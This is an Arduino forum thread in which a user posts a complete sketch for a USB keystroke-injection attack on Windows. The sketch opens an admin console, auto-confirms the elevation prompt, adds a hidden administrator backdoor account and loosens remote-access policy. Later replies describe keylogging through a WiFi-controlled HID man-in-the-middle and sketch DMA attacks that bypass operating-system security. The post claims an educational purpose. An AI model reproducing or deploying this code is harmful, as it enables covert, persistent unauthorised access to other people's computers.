Go Down

Topic: Simple HID Attack Project (for Windows PCs) (Read 876 times) previous topic - next topic

jayxd116

Nov 18, 2016, 06:45 pm Last Edit: Nov 18, 2016, 07:00 pm by jayxd116 Reason: Addendum
Computers almost never perform a check on HIDs connected to the computer like a mouse, keyboard or joystick because as the name implies Human Interface Device, it's suppose to take inputs from that device without any questions because they're direct inputs from the user.

Imagine if your computer wouldn't trust your mice? "Excuse me Mr. User, I don't think that's a polite gesture you just used, as the operating system I hereby refuse to process your input."

Anyway, so the OS must give unquestioned privilege to HIDs unless they can tell human users from bots. Technically, your computer will accept characters from your keyboard at rate more than 1000 wpm (depending on how the device is configured). Though no one have done that before without smashing the keyboard or acquiring mutations that grants superhuman abilities, it's still possible (for a machine, of course) to "type" at those phenomenal speeds.

So, what does this mean? Trust from the OS + High speed character rates + enslavable typist, er.. machine = Hacking opportunities. For this project, I'll be using Windows as the target OS.

This project is intended for educational purposes only, I strongly advise hackers to use this project on their own computers only or devices they have been given permission.


Code: [Select]
#include <Keyboard.h>

//For the Arduino DUE, after uploading the code through the Programming port, transfer the cable to
//the Native USB port
//After letting the board run this script on your computer, make sure to delete the hidden user
//through the command line as it will not appear in the Control Panel. I will attach a batch file to
//undo this script

const String BackdoorUsername = "Hidden_User";
const String BackdoorPassword = "password123";

const String myScript[] PROGMEM = { //Type your commands here, one command per line.
                                    
//Example script to create a hidden backdoor in a Windows PC and enable Administrative shares
"net user " + BackdoorUsername + " " + BackdoorPassword + " /add",
"net localgroup Administrators " + BackdoorUsername + " /add",
"net accounts /maxpwage:unlimited",
"REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v " + BackdoorUsername + " /t REG_DWORD /d 0 /f /reg:64",
"REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f /reg:64"


                                   };

//Don't forget to update this line
const int numLines = 5;

//Append all commands into one line of code each separated with an "&"
String constructCommandString(const String * str_arr, int sz){
  String finalString = "";

  for (int i = 0 ; i < sz - 1; i++){
    finalString += (str_arr[i] + " & ");
  }

  return finalString + str_arr[sz - 1] + " & exit";
}

void hitEnter(){                    // Send Enter
  Keyboard.releaseAll();
  Keyboard.press(0x0A);
  delay(20);
  Keyboard.release(0x0A);
}

void sendCommand(String cmd){       // Send a command to an active console
  Keyboard.releaseAll();
  delay(100);
  Keyboard.print(cmd);
  delay(200);
  hitEnter();
}
/*
void openApp(String app){
  Keyboard.releaseAll();          
  Keyboard.press(KEY_LEFT_GUI);     //
  delay(20);                        //
  Keyboard.press('r');              // Winkey + R to open Run dialog box
  delay(20);                        //
  Keyboard.releaseAll();            //
  delay(100);
  Keyboard.print(app);              // Types in the app filename and Enter
  hitEnter();                       //
}
*/
void openAdminCMD(){ //Works for Windows 8, 8.1 and 10 only
  Keyboard.releaseAll();
  Keyboard.press(KEY_LEFT_GUI);     //
  delay(20);                        //
  Keyboard.press('x');              // Sends a WinKey + X key combination
  delay(20);                        //
  Keyboard.releaseAll();            //
  delay(100);
  
  Keyboard.press('a');              //
  delay(20);                        // Shortcut letter for Administrator CMD
  Keyboard.release('a');            //
  
  delay(3000);                      // Wait until Administrator Prompt shows up

  Keyboard.press(KEY_LEFT_ARROW);   //
  delay(50);                        // Automatically selects Yes
  hitEnter();                       //
}

/*
void exitWindowsApp(){
  Keyboard.press(KEY_LEFT_ALT);     //
  delay(20);                        //
  Keyboard.press(' ');              // ALT + SPACE combination top open Window options
  Keyboard.releaseAll();            //
  delay(50);                        //
  
  Keyboard.press('c');              //
  delay(50);                        // C for close
  Keyboard.release('c');            //
}
*/
void executePWN(){
  //openApp("cmd");                 //
  openAdminCMD();                   // Current script requires an elevated cmd
  
  delay(200);                       // Delays are necessary to avoid typing before the Window appears
  
  sendCommand(constructCommandString(myScript, numLines));
  
  delay(50);
}

void setup() {
  pinMode(LED_BUILTIN, OUTPUT);
  digitalWrite(LED_BUILTIN, LOW);
  
  Keyboard.begin();
  
  delay(1000);
  executePWN();
}

void loop() {
  digitalWrite(LED_BUILTIN, HIGH);
  delay(80);
  digitalWrite(LED_BUILTIN, LOW);
  delay(80);
}


Addendum: Edit the backdoor removal batch file with a text editor according to the username you chose. I used "Power_User" in the script file, replace all occurrences with the username you've chosen.

xl97

nice project.

however this has been done many times before..  (but a nice twist on the account creation)

There are MANY variants of the RubberDucky project...

I myself made one not to long ago that also adds in an ESP8266 module (acting as a captive portal) to serve up my GUI page so I can execute (whatever pre-made actions) remotely from cell phone/tablet..etc..

We used it to play a joke on a fellow co-working..

sending text and moving his mouse all remotely through the ESP >> Pro-Micro  >> PC  toolchain


but could have easily reached out to the internet and executed a (malicious) payload if desired... or grabbed any number of protected/password files and sent them a remote local for cracking later on...etc..etc.







jayxd116

Yeah. It is my first project about HIDs. I have another project which I will be posting soon which involves using two HIDs (I used two because the MCU's in my disposal each only provide one USB interface) to serve as an MITM between a computer and a device such as a mouse or keyboard.

There's a WiFi module included which allows remote access to the device.

The first MCU acts as a device to a computer, the other one act as a host for a mouse/keyboard which will relay the signals to the device slave. The slave is connected to the WiFi module which receives commands from a TCP console. It can be switched between three modes: Listen, Pwn and Relay. The Listen mode is basically a keylogger, the Pwn mode intercepts the user's input and it can be set to trigger a certain action whenever a user presses a key or a combination of keys or words (for example, I set up a prank in the office which listens in the keystrokes of the user if they have typed the words: porn, sex, nude, etc.. which will trigger an action to open a notepad and then type the words "These are unholy words, your keyboard forbids it.") lol.

I have another advanced project, about USB, currently under research which involves DMA attacks to a computer system, I'm still working on the assembly code. I'm just going to use an Arduino for the front-end, the core of the project will be based on an FPGA. In my experience, it's fairly easy to gain DMA access to a USB controller which does not have IOMMU, also for the USB version 3.0 and 3.1 it is almost a cakewalk since they allow DMA access on certain circumstances. Basically, when you have gained DMA access, you have just about any access to the computer. Since it's residing below the OS, you can circumvent the OS's security measures.


Go Up
 


Please enter a valid email to subscribe

Confirm your email address

We need to confirm your email address.
To complete the subscription, please click the link in the email we just sent you.

Thank you for subscribing!

Arduino
via Egeo 16
Torino, 10131
Italy